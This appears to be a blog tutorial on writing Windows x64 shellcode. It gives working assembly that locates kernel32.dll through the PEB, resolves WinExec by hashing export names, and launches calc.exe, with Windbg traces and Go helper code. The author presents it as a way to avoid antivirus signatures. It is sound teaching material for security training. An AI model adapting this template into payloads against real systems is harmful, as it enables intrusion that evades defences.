2. Windows x64 Shellcode Development intro
#x64 #shellcode #golang #asm
Introduction
Shellcode is a small piece of code written in assembly language that is used to perform a specific function in the context of a software exploit. The term "shellcode" comes from the idea that the code often opens a shell, providing an attacker with command-line access to a compromised system.
Shellcode is commonly associated with security exploits, especially in the field of cybersecurity and penetration testing. It is often injected into a vulnerable program's memory through various means, such as buffer overflows or other vulnerabilities, to take control of the program's execution flow.
The functionality of shellcode can vary widely, depending on the goals of the attacker. It might include actions like spawning a shell, downloading and executing malicious payloads, or performing other malicious activities.
It's important to note that while shellcode itself is not inherently malicious, it is commonly used as a component of exploits and attacks.
A common tool for generating shellcode is msfvenom. Any payload generated from this tool is heavily signatured by AV/EDR vendors. Being able to write custom shellcode is a great addition to the arsenal of any offensive security professional.
Assembly - Intel Syntax
Throughout this blog post I will be using Intel Syntax. I think it's much easier to read and write. It's also the default syntax for Windbg which is the debugger I will be using for testing my assembly code.
Syntax
Intel syntax follows this convention:
instruction destination, source;
So let's take a a real example. The add command will add the value on the right to the to the value on the left.
add rax,1;
In this case if rax had the value 2 before the command was ran, after execution it will have the value of 3.
Common ASM instructions
mov rax,1;
Moves value 1 (decimal) to rax. Add 0x in front of the number for hex values
mov rax, qword ptr [r8];
Moves the qword from the location of r8 to rax
add rax,1;
Adds 1 to rax
sub rax,1;
Subtracts 1 from rax
push rax;
Pushes the value of rax to the stack
pop rax;
Pops the first value of the stack into rax;
call rax;
Calls the function at the address stored in rax
jmp rax;
Jumps at the address stored in rax
xor rax,rax;
logical xor, zeros the contents of rax
int3;
breakpoint
The above instructions are the most commonly used when we are writing shellcode. A few others will be used but they will be explained as we walk through the actual code.
Registers
The whole list of registers can be found on microsoft's website. Let's have a quick look on how some of the registers will be used within the shellcode.
Let's take rax as an example.
rax
64-bit register
eax
32-bit register (lower 32 bits of rax)
ax
16-bit register (lower 16 bits of eax)
ah
8-bit register (higher 8 bits of ax)
al
8-bit register (lower 8 bits of ax)
Let's take r8 as another example
r8
64-bit register
r8d
32-bit register (lower 32 bits of r8)
r8w
16-bit register (lower 16 bits of r8d)
r8b
8-bit register (lower 8 bits of r8w)
d - double word
w - word
b - byte
Shellcode template
A good template I found online when I was looking for one can be found here.
I am not a big fan of python so I ported the above script in go. Also to make it easy for development and debugging I will include the shellcode runner script and automatically launch and attach Windbg Preview.
The ported code can be downloaded from my github page here. If you are more familiar with python you can use the original template from exploitdb and follow along. Only caveat is that you will have to write your own shellcode runner to execute the code.
Objective
With everything we have now in place, let's have a quick look at the code we are trying to execute in a higher level language.
package main
import (
"syscall"
"unsafe"
"golang.org/x/sys/windows"
)
func main() {
hModule, _ := windows.LoadLibrary("kernel32.dll")
winexecaddr, _ := windows.GetProcAddress(hModule, "WinExec")
calcstring, _ := syscall.BytePtrFromString("calc.exe")
syscall.SyscallN(
winexecaddr,
uintptr(unsafe.Pointer(calcstring)),
0x1)
}
From the above code we essentially have 4 lines of code we would like to turn into assembly.
Line 12: Import kernel32.dll
Line14: Get the Process address of WinExec
Line16: Get a Pointer to a null terminated string "calc.exe"
Line 18: Call the Winexec function passing the pointer from line 16 as the first argument and 1 as the second.
Shellcode
Finding kernel32.dll
As mentioned previously the first step of developing our shellcode is to find the base address of kernel32.dll in memory. Kernel32.dll is always loaded in the process memory on creation.
To find the address we have to perform the following tasks.
From PEB we can get the PEB_LDR_DATA
And from PEB_LDR_DATA we can get InMemoryOrderModuleList
Let's walk through the assembly code in windbg to ensure we get the expected results. We start by adding a breakpoint int3;
at the top of our shellcode.
"find_kernel32:",
" int3;",
" xor rdx, rdx;",
" mov rax, gs:[rdx+0x60];", // RAX stores the value of ProcessEnvironmentBlock member in TEB, which is the PEB address
" mov rsi,[rax+0x18];", // Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure
" mov rsi,[rsi + 0x20];", // RSI is the address of the InMemoryOrderModuleList member in the _PEB_LDR_DATA structure
" mov r9, [rsi];", // Current module is current executable
" mov r9, [r9];", // Current module is ntdll.dll
" mov r9, [r9+0x20];", // Current module is kernel32.dll
" jmp call_winexec;",
Get the address of the PEB structure from TEB
Line 3: In the context of Windows, the gs
register points to the thread information block (TEB), which contains information about the current thread
In Windbg we can view the structure using the following command
dt nt!_TEB @$teb

We can see that the PEB is located at offset 0x60 from the beginning of the TEB. Once we step over the following instruction we should get the address of PEB in rax
mov rax,qword ptr gs:[rdx+60h]
A quick sanity check confirms that the value in the rax register matches the one from the TEB.
0:001> r rax
rax=00000009d0110000
From PEB we can get the PEB_LDR_DATA
Line 5: We have the value of PEB in RAX and we now try to get the address of the PEB_LDR_DATA.
We can then use the following command to view the PEB Structure and identify the offset for LDR
dt nt!_PEB 00000009d0110000

As we can see from above the offset to Ldr is 0x18. Let's step over line 5 that has the following instruction to see if we get the address of PEB_LDR_DATA in the RSI register
" mov rsi,[rax+0x18];"
Let's do a quick sanity check using windbg
0:001> p
0000016b`78f8000d 488b7620 mov rsi,qword ptr [rsi+20h] ds:00007ffc`22ff6400=0000016b52262c80
0:001> r rsi
rsi=00007ffc22ff63e0
Great, we now have the address of the struct in rsi
We can get InMemoryOrderModuleList from PEB_LDR_DATA
Line 6: We now have the PEB_LDR_DATA address in rsi and we want to get the value of InMemoryOrderModuleList to rsi. Let's view the struct in windbg once again to make sure we have the correct offset in our shellcode.

The offset seems to be correct in our code
" mov rsi,[rsi + 0x20];"
Let's step over in our code to see if we get the right value in rsi.
0:001> p
0000016b`78f80011 4c8b0e mov r9,qword ptr [rsi] ds:0000016b`52262c80=0000016b52262ae0
0:001> r rsi
rsi=0000016b52262c80
Walk the link list.
Kernel32 comes after the current executable and ntdll. So moving forward twice should give us the _LDR_DATA_TABLE_ENTRY of kernel32. Let's confirm this.
First Entry ks.exe:
dt _LDR_DATA_TABLE_ENTRY 0x16b52262c80-0x10

Second entry ntdll.dll

Third entry kernel32.dll

We can see from the beginning of the structure the offset to the DllBase is at 0x30. Since we are substructing 0x10 from the r9 register to get to the beginning of the structure we only need to add 0x20 to get the DllBase value.
" mov r9, [r9+0x20];",
Let's confirm that after stepping over line 9 in our code the register r9 will hold the kernel32.dll base address.

Awesome.. with the address of kernel32 in r9 we can now proceed to get the address of winexec
GetProcAddress
The next step step in our shellcode is to create a function to walk through the exports directory of any given dll (base address) and return the absolute address of the function. Although in this example we will only call it once, in larger and more real world scenarios we will most likely have to call this function multiple times.
"parse_module:", // Parsing DLL file in memory
" mov ecx, dword ptr [r9 + 0x3c];", // R9 stores the base address of the module, get the NT header offset
" xor r15, r15;",
" mov r15b, 0x88;", // Offset to Export Directory
" add r15, r9;",
" add r15, rcx;",
" mov r15d, dword ptr [r15];", // Get the RVA of the export directory
" add r15, r9;", // R14 stores the VMA of the export directory
" mov ecx, dword ptr [r15 + 0x18];", // ECX stores the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;", // R14 stores the VMA of ENPT
"search_function:", // Search for a given function
" jrcxz not_found;", // If RCX is 0, the given function is not found
" dec ecx;", // Decrease index by 1
" xor rsi, rsi;",
" mov esi, [r14 + rcx*4];", // RVA of function name string
" add rsi, r9;", // RSI points to function name string
"function_hashing:", // Hash function name function
" xor rax, rax;",
" xor rdx, rdx;",
" cld;", // Clear DF flag
"iteration:", // Iterate over each byte
" lodsb;", // Copy the next byte of RSI to Al
" test al, al;", // If reaching the end of the string
" jz compare_hash;", // Compare hash
" ror edx, 0x0d;", // Part of hash algorithm
" add edx, eax;", // Part of hash algorithm
" jmp iteration;", // Next byte
"compare_hash:", // Compare hash
" cmp edx, r8d;",
" jnz search_function;", // If not equal, search the previous function (index decreases)
" mov r10d, [r15 + 0x24];", // Ordinal table RVA
" add r10, r9;", // Ordinal table VMA
" movzx ecx, word ptr [r10 + 2*rcx];", // Ordinal value -1
" mov r11d, [r15 + 0x1c];", // RVA of EAT
" add r11, r9;", // VMA of EAT
" mov eax, [r11 + 4*rcx];", // RAX stores RVA of the function
" add rax, r9;", // RAX stores VMA of the function
" ret;",
"not_found:",
" ret;",
Let's break the code down into smaller pieces to understand exactly what's happening.
parse_module
"parse_module:", // Parsing DLL file in memory
" mov ecx, dword ptr [r9 + 0x3c];", // R9 stores the base address of the module, get the NT header offset
" xor r15, r15;",
" mov r15b, 0x88;", // Offset to Export Directory
" add r15, r9;",
" add r15, rcx;",
" mov r15d, dword ptr [r15];", // Get the RVA of the export directory
" add r15, r9;", // R15 stores the VMA of the export directory
" mov ecx, dword ptr [r15 + 0x18];", // ECX stores the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;", // R14 stores the VMA of ENPT
The parse_module function expects 2 values from the caller:
R9 -> should hold the base address of the dll
R8d -> should have the hash of the function (more on this later)
Line 2: The offset value to the beginning of the nt header is moved to ecx
PE-bear is an excellent tool that can be used to cross check if the values we see in windbg are indeed the right ones.

Let's step over the code in line 2 to make sure we are getting the correct result. The value we expect to see in ecx is E8.
0:010> t
000001f8`6d17001d 418b493c mov ecx,dword ptr [r9+3Ch] ds:00007ffc`2127003c=000000e8
0:010> p
000001f8`6d170021 4d31ff xor r15,r15
0:010> r ecx
ecx=e8
Lines 3-7: What happens on these lines is basically the following calculation
NtHeader = DllBase + 0xE8
Export Directory = NtHeader + 0x88
0:010> ?e8+0x88
Evaluate expression: 368 = 00000000`00000170
From a quick calculation we can see that Export directory is at offset 0x170 from the base address. Let's check in PE Bear if that offset points to the export directory in PE Bear

We can see that the offset 0x170 points to the RVA of the export directory.
Let's walk over the following instruction in windbg to ensure that r15 holds the RVA value we expect to see
" mov r15d, dword ptr [r15];",
0:010> r r15
r15=000000000009e750
We can now add r9 which holds the dllBase address to calculate the absolute address of the Export directory.
" add r15, r9;",

In windbg we can confirm that we are indeed pointing to the right location by viewing the first two double words.
0:010> r r15; dd r15 L2
r15=00007ffc2130e750
00007ffc`2130e750 00000000 2e35230e
We can see the value of Characteristics (00000000 ) and ReproChecksum (2e35230e)
" mov ecx, dword ptr [r15 + 0x18];", // ECX stores the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];", // Get the RVA of ENPT
" add r14, r9;", // R14 stores the VMA of ENPT
The last 3 lines store the number of function names in ecx and the address of names in r14.
0:010> r ecx
ecx=687
0:010> dd r14
00007ffc`21310194 000a28cb 000a2904 000a2937 000a2946
00007ffc`213101a4 000a295b 000a2980 000a2989 000a2992
00007ffc`213101b4 000a29a3 000a29b4 000a29f9 000a2a1f
A quick look in PE-bear reveals that we have the right values in both ecx, and r14. We can see that the first value at r14 is the same as the first Name RVA below.

search_function
"search_function:", // Search for a given function
" jrcxz not_found;", // If RCX is 0, the given function is not found
" dec ecx;", // Decrease index by 1
" xor rsi, rsi;",
" mov esi, [r14 + rcx*4];", // RVA of function name string
" add rsi, r9;", // RSI points to function name string
.
.
.
"not_found:",
" ret;",
The functionality of this code is fairly simple.
Line 2: checks if ecx = 0 and if it is it jumps to line 10 that terminates the execution of our shellcode. When ecx is 0 it means that our shellcode went through the whole export list without finding the requested function.
Line3: Decrements ecx by 1 for every iteration
Line4: zeros rsi
Line 5: For the first iteration the last Export RVA is moved to esi
Line 6: Adds base address to RVA to get absolute value in rsi
The second time the loop reaches this point this is the output from Windbg
000001f8`6d170049 4c01ce add rsi,r9
0:010> r rsi
rsi=00000000000ad02a
0:010> p
000001f8`6d17004c 4831c0 xor rax,rax
0:010> db rsi
00007ffc`2131d02a 75 61 77 5f 77 63 73 6c-65 6e 00 75 61 77 5f 77 uaw_wcslen.uaw_w
00007ffc`2131d03a 63 73 72 63 68 72 00 00-00 00 f0 f0 0a 00 00 00 csrchr..........
It matches the exported functions from PE-bear

function_hashing
The shellcode author in this case came up with a smart algorithm that generates a hash based on the Function name. It then compares the generated hash with the hash we provide it. The caveat of that is that we have to write a piece of code to calculate that hash for us.
"function_hashing:", // Hash function name function
" xor rax, rax;",
" xor rdx, rdx;",
" cld;", // Clear DF flag
"iteration:", // Iterate over each byte
" lodsb;", // Copy the next byte of RSI to Al
" test al, al;", // If reaching the end of the string
" jz compare_hash;", // Compare hash
" ror edx, 0x0d;", // Part of hash algorithm
" add edx, eax;", // Part of hash algorithm
" jmp iteration;", // Next byte
Lines 1-4 : Zero rax & rdx and clear DF flag
The iteration code is where the hashing happens.
Line 6: loadsb takes the first byte from the address pointed to by the RSI and write is to the lowest byte of rax (al)
Lines 8-9: Checks if the value is 0 that indicates the end of the string and jumps to the next function
Line 10: The x86-64 assembly instruction ror edx, 0x0d
performs a "rotate right" operation on the contents of the edx register. In this case, the rotation is by 13 bits (0x0d in hexadecimal is 13 in decimal).
Imagine edx could only hold 4 bits. Here is an example of the ror effect after rotating right 1 bit.
edx = 0101
ror edx, 0x01
edx= 1010
Line 11: Adds eax to edx
Line 12: Loops to the next byte
compare_hash
"compare_hash:", // Compare hash
" cmp edx, r8d;",
" jnz search_function;", // If not equal, search the previous function (index decreases)
" mov r10d, [r15 + 0x24];", // Ordinal table RVA
" add r10, r9;", // Ordinal table VMA
" movzx ecx, word ptr [r10 + 2*rcx];", // Ordinal value -1
" mov r11d, [r15 + 0x1c];", // RVA of EAT
" add r11, r9;", // VMA of EAT
" mov eax, [r11 + 4*rcx];", // RAX stores RVA of the function
" add rax, r9;", // RAX stores VMA of the function
" ret;",
The last part of the code is where the actual comparison takes place with the provided hash. Our hash will be located in r8d.
Line 2: Compares calculated hash from the previous function with the one we provided
Line 3: If they are not equal it jumps back to our search_function loop to get the next entry.
Lines 4-10 Only execute if the provided and calculated hashes match
Line 4: r15 holds the address of the export directory. The offset 0x24 points to the AddressOfNameOrdinals

000001f8`6d170064 458b5724 mov r10d,dword ptr [r15+24h] ds:00007ffc`2130e774=000a1bb0
0:010> p
000001f8`6d170068 4d01ca add r10,r9
0:010> r r10
r10=00000000000a1bb0
Line 5: Adds base address to the RVA to get absolute address of the Address of name ordinal
Line 6: Adds the ordinal value of the function above the desired one in ecx

0:010> r ecx
ecx=638
As we can see the ordinal value in ecx is pointing to the function WideCharToMultiByte
The ordinal value of WinExec is 639.
Lines 7-8: Point to the addresses of functions. That 's the value we need to call the function.
Line 9: Gets the RVA of the address of function for WinExec in eax
0:010> r eax
eax=68660
Comparing with the previous screenshot we can see that it's a match
Line 10: We add the base address and we have the function in the rax register ready to be called as needed.
Helper code for hash calculation
If you made it to this point, you are probably wondering how can you calculate the hash and provide it to the assembly code.
The following code will calculate and print the hash for us:
package main
import (
"fmt"
"math/bits"
)
func main() {
funcName := "WinExec"
fmt.Printf("Function Name: %s , Function Hash: 0x%x", funcName, HashCalculator(funcName))
}
func HashCalculator(funcName string) uint32 {
var hash uint32 = 0
// Convert string to byte slice
byteSlice := []byte(funcName)
for _, byte := range byteSlice {
hash = bits.RotateLeft32(hash, -0x0d)
hash += uint32(byte)
}
return hash
}
Call the WinExec function
"call_winexec:",
" mov r8d, 0xe8afe98;", // WinExec Hash
" call parse_module;", // Search and obtain address of WinExec
" xor rcx, rcx;",
" push rcx;", // \0
" mov rcx, 0x6578652e636c6163;", // exe.clac
" push rcx;",
" lea rcx, [rsp];", // Address of the string as the 1st argument lpCmdLine
" xor rdx,rdx;",
" inc rdx;", // uCmdShow=1 as the 2nd argument
" sub rsp, 0x28;",
" call rax;", // WinExec
We now reach the end of our code.
Referring back to the original go code we need to get a pointer to a null terminated string, in this example a pointer to 'calc.exe' and then call the function.
Line 2: we can use the helper code to calculate the function hash:
Function Name: WinExec , Function Hash: 0xe8afe98
We then feed the value to r8d.
Line 3: We call the parse_module function. if everything went well rax will have the address of the function

Great, we now only have to pass the arguments to the function.
It's a good place to pause now and have a quick look on the x64 calling convention. When calling a function in x64 the first four arguments will go to the registers rcx,rdx,r8,r9 and all the rest to the stack from right to left. So the last argument should be pushed to the stack first and so on.
A great source of information is Microsoft's website.
With this knowledge let's pass the arguments to WinExec.
UINT WinExec(
[in] LPCSTR lpCmdLine,
[in] UINT uCmdShow
);
So WinExec definition from microsoft states that that the first argument should be the a pointer to the null terminated string.
Lines 4-8:
Line 4: zero -> rcx
Line 5: push 0 to the stack. This will act as the null termination
Line 6: The hex values of calc.exe are moved to rcx
To convert ascii to hex I am using this online converter https://www.rapidtables.com/convert/number/ascii-to-hex.html
calc.exe = 63 61 6C 63 2E 65 78 65 + 00
" mov rcx, 0x6578652e636c6163;", // exe.clac
Line 7: Pushes the string to the stack
Line 8: Get a pointer to the string in the rcx register. ( first argument)
Lines 9-10: zero rdx and inc by 1.
Line 11: Argument storage space ( shadow space) and stack alignment
Line 12: Finally calling the function.
0:010> r rcx,rdx
rcx=0000001ea51ff9d8 rdx=0000000000000001
0:010> da 0000001ea51ff9d8
0000001e`a51ff9d8 "calc.exe"
Just before calling the function this is what we see in rcx,rdx which is exactly what we expect.
Stepping over the function should launch a calc.exe process

The whole shellcode template can be found here.
Last updated
Was this helpful?